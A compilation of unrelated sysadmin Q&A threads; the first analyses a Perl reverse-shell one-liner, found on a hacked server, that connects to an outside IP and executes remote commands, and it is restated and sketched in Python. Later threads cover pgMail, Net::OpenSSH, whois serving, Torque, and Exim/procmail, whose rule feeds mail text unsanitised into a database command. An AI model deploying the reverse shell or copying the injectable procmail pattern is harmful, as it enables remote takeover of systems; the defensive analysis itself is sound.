My server got hacked, and ps aux shows that it's running this program now:
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
I don't know Perl...what is this program doing?
It opens a socket to that IP. Then it sets up STDIN to read from the socket and STDOUT to write to it, building a direct communication channel between the process and that IP.
Then it goes into a while loop in which it runs, via system, whatever comes through STDIN.
It does this in a forked process, fire-and-forget (detached) style, where the parent exits right away. So the launching process executes and exits immediately, leaving behind a detached child that talks to that IP and runs whatever commands it receives.
Short answer:
system$_ while<>;
basically means "as long as there is input, execute the commands you get."
If I run nc -l -p 1212 on my machine, and then you run this script on your machine, then you open a connection to me where I can issue commands that your machine will run.
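For analysis purposes, the same structure can be sketched in Python (a benign loopback illustration of the pattern, not the attacker's actual code; the function name `reverse_shell` is chosen here). One difference from the Perl: because Perl redirects STDOUT to the socket, `system`'s output flows back automatically, whereas this sketch captures and writes it explicitly:

```python
import socket
import subprocess

def reverse_shell(host, port):
    """Connect out to host:port, then execute every line the remote
    side sends and return the output. Mirrors the one-liner's logic:
    socket connect, wire stdio to the socket, `system $_ while <>`."""
    c = socket.create_connection((host, port))   # PeerAddr => "host:port"
    f = c.makefile("rwb")                        # like fdopen'ing STDIN/STDOUT on $c
    for line in f:                               # while (<>) { ... }
        out = subprocess.run(line.decode().strip(), shell=True,
                             capture_output=True)
        f.write(out.stdout + out.stderr)         # Perl gets this for free via STDOUT
        f.flush()
    c.close()
```

Running `nc -l -p 1212` on the "attacker" side and pointing this at it reproduces the same remote command loop.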
You have already been told what it does, and it's clearly malicious. That Perl code is equivalent to this:
use IO;
$p = fork;
exit, if ( $p );
$c = IO::Socket::INET->new( PeerAddr => "169.50.9.58:1212" );
STDIN->fdopen( $c, 'r' );
$~->fdopen( $c, 'w' );
system $_ while <>;
Here's the result of a whois query for that IP address. You may want to send an email to the "abuse" address:
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '169.50.9.32 - 169.50.9.63'
% Abuse contact for '169.50.9.32 - 169.50.9.63' is 'email@softlayer.com'
inetnum: 169.50.9.32 - 169.50.9.63
netname: NETBLK-SOFTLAYER-RIPE-CUST-JS17702-RIPE
descr: VidScale, Inc
country: US
admin-c: JS17702-RIPE
tech-c: JS17702-RIPE
status: LEGACY
mnt-by: MAINT-SOFTLAYER-RIPE
created: 2016-01-09T01:24:25Z
last-modified: 2016-01-09T01:24:25Z
source: RIPE
person: John Scharber
address: 4406 Whistling Wind Way
address: Placerville, CA 95667 US
phone: +1.866.398.7638
nic-hdl: JS17702-RIPE
abuse-mailbox: email@vidscale.com
mnt-by: MAINT-SOFTLAYER-RIPE
created: 2016-01-09T01:24:23Z
last-modified: 2016-01-09T01:24:23Z
source: RIPE
% This query was served by the RIPE Database Query Service version 1.88.1 (BLAARKOP)
The other answers already adequately answer how this back door works. Just to recap, it allows an unprivileged user access to the system without authenticating. You only need to know which port number to connect to in order to run arbitrary programs on the computer.
The reason this is "nefarious" is that it bypasses authentication. If it required you to log in with a valid user name and password, it would not be much different from a basic telnet server. (Granted, those are bad too; in today's world you would absolutely require encrypted authenticated access, i.e. ssh or similar.)
A user who already has legitimate login access to your system has no need to run a program like this. They already have ssh access or similar.
The reason intruders install such programs is often that it allows them to pivot from a simple vulnerability (like a simple "Bobby Tables" SQL injection) which only allows them to run a single command. Now they have interactive access and can conveniently run many commands without using (and potentially exposing) the original exploit again; from here, they can probably figure out a way to pivot further on to a privileged account (i.e. root), or initiate lateral movement to other systems within your perimeter.
SQL Server has a cool feature in sp_send_dbmail (quick guide here) that lets you email out reports. Does anything like that exist in Postgres? My postgres is hosted at Heroku so I can share a dataclip, but I am wondering if there's an easy way to schedule emails to send out reports.
You can use pgMail to send mail from within PostgreSQL.
Prerequisites:
Before you can use pgMail, you must install the TCL/u procedural language. TCL/u is an UNRESTRICTED version of TCL that your database can use in its stored functions. Before you go nuts installing the unrestricted TCL procedural language in all of your databases, remember that you must take adequate security precautions when adding the TCL/u language to your database! I will not be responsible for misconfigured servers allowing dangerous users to do bad things!
To install the TCL/u procedural language, you must have compiled (or used binary packages) and installed the TCL extensions of PostgreSQL. Once you are sure this has been completed, simply type the following at the unix shell prompt as a database administrator.
# createlang pltclu [YOUR DATABASE NAME]
In the place of [YOUR DATABASE NAME], put the name of the database to which you will be adding the stored procedure. If you want it to be added to all NEW databases, use "template1" as your database name.
Before adding the new procedure to the database, first do the following:
Replace the text <ENTER YOUR MAILSERVER HERE> with the fully qualified domain name for your mailserver. i.e., mail.server.com.
Replace the text <ENTER YOUR DATABASESERVER HERE> with the fully qualified domain name for your database server. i.e., db.server.com.
Once you have done the above, you are ready to go.
After this step, use the psql interface to add the pgMail function. Just copy the contents of the pgmail.sql file and paste it into your window. You may also load it directly from the command line by typing:
# psql -e [YOUR DATABASE NAME] < pgMail.sql
Once you have installed the stored function, simply call the procedure as follows.
select pgmail('Send From ','Send To ','Subject goes here','Plaintext message body here.');
select pgmail('Send From ','Send To ','Subject goes here','','HTML message body here.');
Or now, multipart MIME!
select pgmail('Send From ','Send To ', 'Subject goes here','Plaintext message body here.', 'HTML message body here.');
In both the "Send From" and "Send To" fields, you may include either only the email, or the email enclosed in <> with a plaintext name.
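To illustrate what a multipart call like the three-argument form above produces on the wire, here is a sketch using Python's standard email package (an illustration of multipart/alternative mail in general, not pgMail's actual Tcl implementation; all names here are invented for the example):

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def build_multipart(sender, to, subject, text_body, html_body):
    # multipart/alternative: clients render the richest part they
    # understand, so HTML-capable clients show the HTML version and
    # text-only clients fall back to the plaintext part
    msg = MIMEMultipart("alternative")
    msg["From"] = sender
    msg["To"] = to
    msg["Subject"] = subject
    msg.attach(MIMEText(text_body, "plain"))
    msg.attach(MIMEText(html_body, "html"))
    return msg

msg = build_multipart("Alice <alice@example.com>", "bob@example.com",
                      "Report", "plain text body", "<b>html body</b>")
print(msg.get_content_type())   # multipart/alternative
```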
Testing Your Install
I have included an example for you to try. You MUST FIRST replace the string in the example.execute.sql script with your real email address, and install the plpgsql language just like you did pltclu above. You can do that by entering createlang plpgsql [YOUR DATABASE NAME].
Once that is complete, first run the example.setup.sql. Then execute the example.execute.sql script. Provided everything is working well, you will see 2 emails in your mailbox. To remove this example, execute the example.cleanup.sql script.
SMTP Auth
pgMail does not support SMTP auth. Most of the folks that use it either set up a local mailserver on the database server for local queueing and then use that setup for any relaying required (with auth), or, alternatively, make a special rule in the /etc/mail/access (or equivalent) file to allow relaying from the IP used by the database server. Obviously, the latter option doesn't work with GMail.
Part of the reasoning behind this is that auth would be problematic given the transactional nature of pgMail for big jobs. The ideal solution would be to drop an Exim server on the database server and have it handle any type of authentication as a smart relay. Here is a link that has more info on how to set an SMTP server up.
Documentation: http://brandolabs.com/pgmail
You can also use py_pgmail from https://github.com/lcalisto/py_pgmail
Create py_pgmail function by running py_pgmail.sql
After the function is created you can simply call the function from anywhere in the database as:
select py_pgmail('sentFromEmail',
array['destination emails'],
array['cc'],
array['bcc'],
'Subject',
'<USERNAME>','<PASSWORD>',
'Text message','HTML message',
'<MAIL.MYSERVER.COM:PORT>')
array['cc'] and array['bcc'] can be empty arrays like array['']
tl;dr: How do I capture stderr from within a script to get a more specific error, rather than just relying on the generic error from Net::OpenSSH?
I have a tricky problem I'm trying to resolve. Net::OpenSSH only works with protocol version 2, but we have a number of devices on the network that only support version 1. I'm trying to find an elegant way of detecting when the remote end is the wrong version.
When connecting to a version 1 device, the following message shows up on the stderr
Protocol major versions differ: 2 vs. 1
However the error that is returned by Net::OpenSSH is as follows
unable to establish master SSH connection: bad password or master process exited unexpectedly
This particular error is too general, and doesn't specifically indicate a protocol version difference. I need to handle protocol differences by switching over to another library, but I don't want to do that for every connection error.
We use a fairly complicated process that was originally wired for telnet only access. We load up a "comm" object, that then determines stuff like the type of router, etc. That comm object invokes Net::OpenSSH to pass in the commands.
Example:
my $sshHandle = eval { $commsObject->go($router) };
my $sshError  = $sshHandle->{ssh}->error;
if ($sshError) {
    $sshHandle->{connect_error} = $sshError;
    return $sshHandle;
}
Where the protocol error shows up on stderr is here
$args->{ssh} = eval {
    Net::OpenSSH->new(
        $args->{node_name},
        user        => $args->{user},
        password    => $args->{tacacs},
        timeout     => $timeout,
        master_opts => [ -o => "StrictHostKeyChecking=no" ],
    );
};
What I would like to do is pass in the stderr protocol error instead of the generic error passed back by Net::OpenSSH. I would like to do this within the script, but I'm not sure how to capture stderr from within a script.
Any ideas would be appreciated.
Capture the master stderr stream and check it afterwards.
See here how to do it.
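The general capture-and-inspect idea looks like this, sketched in Python with subprocess standing in for the SSH child process (the diagnostic string is the one from the question; the function name and the child command are invented for the illustration):

```python
import subprocess
import sys

def run_capturing_stderr(cmd):
    """Run a child process and return (exit_code, stdout, stderr) so
    the caller can inspect protocol-level diagnostics on stderr
    instead of relying on a generic connection error."""
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.returncode, proc.stdout, proc.stderr

# Simulate a child that prints the v1 diagnostic on its stderr
code, out, err = run_capturing_stderr(
    [sys.executable, "-c",
     "import sys; sys.stderr.write('Protocol major versions differ: 2 vs. 1')"])
if "Protocol major versions differ" in err:
    print("remote end is SSH v1 only")
```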
Another approach you can use is just to open a socket to the remote SSH server. The first thing it sends back is its version string. For instance:
$ nc localhost 22
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-8
^C
From that information you should be able to infer if the server supports SSH v2 or not.
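A sketch of that banner probe (the parsing follows the SSH identification-string format from RFC 4253 section 4.2; the function name is invented here, and a server that supports both versions announces itself as "1.99"):

```python
import socket

def ssh_protocol_version(host, port=22, timeout=5):
    """Read the server's SSH identification string and return its
    protocol-version field, e.g. '2.0', '1.99' (both v1 and v2
    supported) or '1.5' (v1 only)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.makefile("rb").readline().decode("ascii", "replace").strip()
    # Format: SSH-protoversion-softwareversion [comments]
    if not banner.startswith("SSH-"):
        raise ValueError("not an SSH banner: %r" % banner)
    return banner.split("-", 2)[1]
```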
Finally, if you also need to talk to SSH v1 servers, the development version of my other module Net::SSH::Any is able to do it using the OS native SSH client, though it establishes a new SSH connection for every command.
use Net::SSH::Any;
my $ssh = Net::SSH::Any->new($args->{node_name},
user => $args->{user},
password => $args->{tacacs},
timeout => $timeout,
backends => 'SSH_Cmd',
strict_host_key_checking => 0);
Update: In response to Bill's comment below on the issue of sending multiple commands over the same session:
The problem with sending commands over the same session is that you have to talk to the remote shell, and there isn't a way to do that reliably in a generic fashion, as every shell does things differently; this is especially true of network-equipment shells, which are quite automation-unfriendly.
Anyway, there are several modules on CPAN trying to do that, implementing a handler for every kind of shell (or OS). For instance, check Oliver Gorwits's modules Net::CLI::Interact, Net::Appliance::Session and Net::Appliance::Phrasebook. The phrasebook approach seems quite suitable.
Warning: This is long and can probably only be answered by a professional perl programmer or someone involved with a domain registrar or registry company.
I run a website hosting, design, and domain registration business. We are a registrar for some TLDs and a couple of them require us to have a whois server for domains registered with us. I have a whois server set up which is working but I know it's not doing it the right way, so I'm trying to figure out what I need to change.
My script is set up so going to whois.xxxxxxxxxx.com via browser or doing whois -h whois.xxxxxxxxxx.com from shell works. A whois on a domain registered with us gives whois data and a domain not registered with us says it's not registered with us.
If needed, I can give the whois url, or it can be figured out from my profile. I just don't want to put it here to look like advertising or for search engines to end up going to.
The problem is how my script does it.
My whois URL is set up in Apache's httpd.conf as a normal subdomain listening on port 80, and it's also set up to listen on port 43. When called via a browser, it works properly: it presents a form asking for a domain and checks our database for that domain. How it works when called from a shell is fine as well, but how it distinguishes between the two is weird, and how it gets the domain is also weird. It works, but it can't be the right way to do it.
How it distinguishes between shell and http is:
if ($ENV{REQUEST_METHOD} ne "GET") {
    &shell_process;
}
else {
    &http_process;
}
It would seem more logical for this to work:
if ($ENV{SERVER_PORT} eq 43) {
    &shell_process;
}
else {
    &http_process;
}
That doesn't work because even when called through port 43 as a whois request, the ENV vars are saying "SERVER_PORT = 80".
How it gets the domain name when called from shell is:
$domain = lc($ENV{REQUEST_METHOD});
You would think the domain would be in QUERY_STRING or, more likely, in the ARGV vars, but it's not.
Here are the ENV vars (that matter) when called via http:
SERVER_NAME = whois.xxxxxxxxxxxxx.com
REQUEST_METHOD = GET
QUERY_STRING = domain=roughdraft.ws&submit=+Get+Whois+
SERVER_PORT = 80
REQUEST_URI = /index.cgi?domain=premierwebsitesolutions.ws&submit=+Get+Whois+
HTTP_HOST = whois.xxxxxxxxxxxxxx.com
Here are the ENV vars (that matter) when called via shell:
SERVER_NAME = whois.xxxxxxxxxxxxxx.com
REQUEST_METHOD = premierwebsitesolutions.ws
QUERY_STRING =
SERVER_PORT = 80
REQUEST_URI =
Notice the SERVER_PORT stays 80 either way, even though through shell it's set up on port 43.
Notice how via shell the REQUEST_METHOD is the domain being looked up.
I've done lots of searching and did find swhoisd (Simple Whois Daemon), but that's only for small databases. I also found the Daemon::Whois perl module, but it uses a CDB database which I know nothing about, it comes with no instructions, and it's a daemon, which I don't really need because the script works fine when called through Apache on port 43.
Does anyone know how this is supposed to be done?
Can I get the script to see that it was called via port 43?
Is it normal to use REQUEST_METHOD this way?
Is a whois server supposed to be running as a daemon?
Thanks for helping, or trying to.
Mike
WHOIS is not an HTTP-like protocol, so attempting to serve it through Apache on port 43 will not work correctly. A whois client simply sends the bare domain name followed by CRLF; Apache parses that as an HTTP request line, and its first token becomes REQUEST_METHOD, which is why the domain shows up there. You will need to write a separate daemon to serve WHOIS; if you don't want to use Daemon::Whois, you will probably at least want to use something like Net::Daemon to simplify things for you.
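To show how little such a daemon actually has to do, here is a minimal sketch (in Python for brevity; the RFC 3912 exchange is just one query line in, one reply out, then close; `REGISTRY` and `lookup` stand in for your real registrant database):

```python
import socketserver

REGISTRY = {"example.ws": "Registrant: Example Corp"}   # stand-in for the real database

def lookup(domain):
    return REGISTRY.get(domain, 'No match for "%s".' % domain)

class WhoisHandler(socketserver.StreamRequestHandler):
    """RFC 3912: the client sends one query line terminated by CRLF;
    the server writes its reply and closes the connection."""
    def handle(self):
        domain = self.rfile.readline().decode("ascii", "replace").strip().lower()
        self.wfile.write(lookup(domain).encode("ascii") + b"\r\n")

def serve(host="", port=43):
    # Binding port 43 requires root; use a high port while testing.
    with socketserver.ThreadingTCPServer((host, port), WhoisHandler) as srv:
        srv.serve_forever()
```

`whois -h yourhost domain` would then work against this directly, with no Apache or CGI environment involved.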
The answer at https://stackoverflow.com/a/933373/66519 describes detecting CLI vs. web invocation. It applies to PHP, but given the lack of answers here, it might help you get to something useful.
I try to execute this example script (https://oss.trac.surfsara.nl/pbs_python/wiki/TorqueUsage/Scripts/Submit)
#!/usr/bin/env python
import sys
sys.path.append('/usr/local/build_pbs/lib/python2.7/site-packages/pbs/')
import pbs
server_name = pbs.pbs_default()
c = pbs.pbs_connect(server_name)
attropl = pbs.new_attropl(4)
# Set the name of the job
#
attropl[0].name = pbs.ATTR_N
attropl[0].value = "test"
# Job is Rerunable
#
attropl[1].name = pbs.ATTR_r
attropl[1].value = 'y'
# Walltime
#
attropl[2].name = pbs.ATTR_l
attropl[2].resource = 'walltime'
attropl[2].value = '400'
# Nodes
#
attropl[3].name = pbs.ATTR_l
attropl[3].resource = 'nodes'
attropl[3].value = '1:ppn=4'
# A1.tsk is the job script filename
#
job_id = pbs.pbs_submit(c, attropl, "A1.tsk", 'batch', 'NULL')
e, e_txt = pbs.error()
if e:
print e,e_txt
print job_id
But the shell shows the error "15025 Queue already exists". With qsub, the job submits normally. I have one queue, 'batch', on my server. Torque version: 4.2.7. pbs_python version: 4.4.0.
What should I do to start a new job?
There are two things going on here. First, there is a bug in pbs_python that maps the 15025 error code to "Queue already exists". Looking at the source of Torque, we see that 15025 actually maps to the error "Bad UID for job execution": the daemon on the Torque server cannot determine whether the user you are submitting as is allowed to run jobs. This could be because of one of two things:
1. The user you are submitting as doesn't exist on the machine running pbs_server.
2. The host you are submitting from is not in the "submit_hosts" parameter of the pbs_server.
Solution For 1
The remedy for this depends on how you authenticate users across systems. You could use /etc/hosts.equiv to specify users/hosts allowed to submit; this file would need to be distributed to all the Torque nodes as well as the Torque server machine. Using hosts.equiv is pretty insecure, though, and I haven't actually used it this way. We use a central LDAP server to authenticate all users on the network and do not have this problem. You could also manually add the user to all the Torque nodes and the Torque server, taking care to make sure the UID is the same on all systems.
Solution For 2
If #1 is not your problem (which I doubt it is), you probably need to add the hostname of the machine you're submitting from to the "submit_hosts" parameter on the torque server. This can be accomplished with qmgr:
[root@torque_server ]# qmgr -c "set server submit_hosts += hostname.example.com"
The pbs_python library that you are using was written for Torque 2.4.x.
The internal APIs of Torque were largely rewritten in Torque 4.0.x, so the library will most likely need to be rewritten for the new API.
Currently the developers of Torque do not test against any external libraries, so these could break at any time.
I am looking for pointers on the best approach to process incoming email for a certain vhost and call an external script with the email data as parameters: basically, to allow email sent to a certain "private" address at a host to automatically insert something into that site's database. I currently have Exim set up as the mail handler.
You have to follow Exim's single-file configuration structure. In the routers section, write your own custom router that will deliver email to your desired php script. In the transports section, write your own custom transport that ensures delivery to that script using curl. Put the following in your /etc/exim.conf file:
############ROUTERS
runscript:
driver = accept
transport = run_script
unseen
no_expn
no_verify
############TRANSPORT
run_script:
debug_print = "T: run_script for $local_part@$domain"
driver = pipe
command = /home/bin/curl http://my.domain.com/mailTest.php --data-urlencode $original_local_part@$original_domain
Where mailTest.php will be your destined script.
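On the receiving end, the script's first job is just to decode the urlencoded address that curl posts. A sketch of that step (in Python; the actual mailTest.php would do the PHP equivalent, and the function name here is invented):

```python
from urllib.parse import unquote_plus

def parse_recipient(body):
    # curl --data-urlencode percent-encodes the value, so the script
    # must decode it back into local_part@domain before any lookup
    return unquote_plus(body)

print(parse_recipient("someuser%40my.domain.com"))   # someuser@my.domain.com
```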
Procmail is a good generic answer. If your needs are very specific, you could hook in your own script directly from your .forward (or Exim's corresponding construct -- can't remember exactly how it differs), but oftentimes, wrapping your own script inside a simple .procmailrc helps you avoid a bunch of iffy details of email delivery, and concentrate on the actual processing.
:0
* ^Subject: secretpassword adduser \/[A-Z]+
| echo "insert $MATCH into users" | mysql -D users